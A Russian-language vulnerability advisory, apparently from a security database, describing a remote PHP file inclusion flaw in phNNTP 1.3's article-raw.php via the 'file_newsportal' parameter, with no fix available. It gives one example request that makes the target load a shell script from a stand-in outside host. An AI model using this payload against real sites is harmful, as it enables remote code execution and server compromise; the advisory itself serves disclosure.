PHP-инклюдинг в phNNTP

Дата публикации:
14.08.2006
Дата изменения:
17.10.2006
Всего просмотров:
2025
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
phNNTP 1.x
Уязвимые версии: phNNTP 1.3, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "file_newsportal" в сценарии article-raw.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://www.site.com/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php?

URL производителя: sourceforge.net/projects/phnntp/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability

или введите имя

CAPTCHA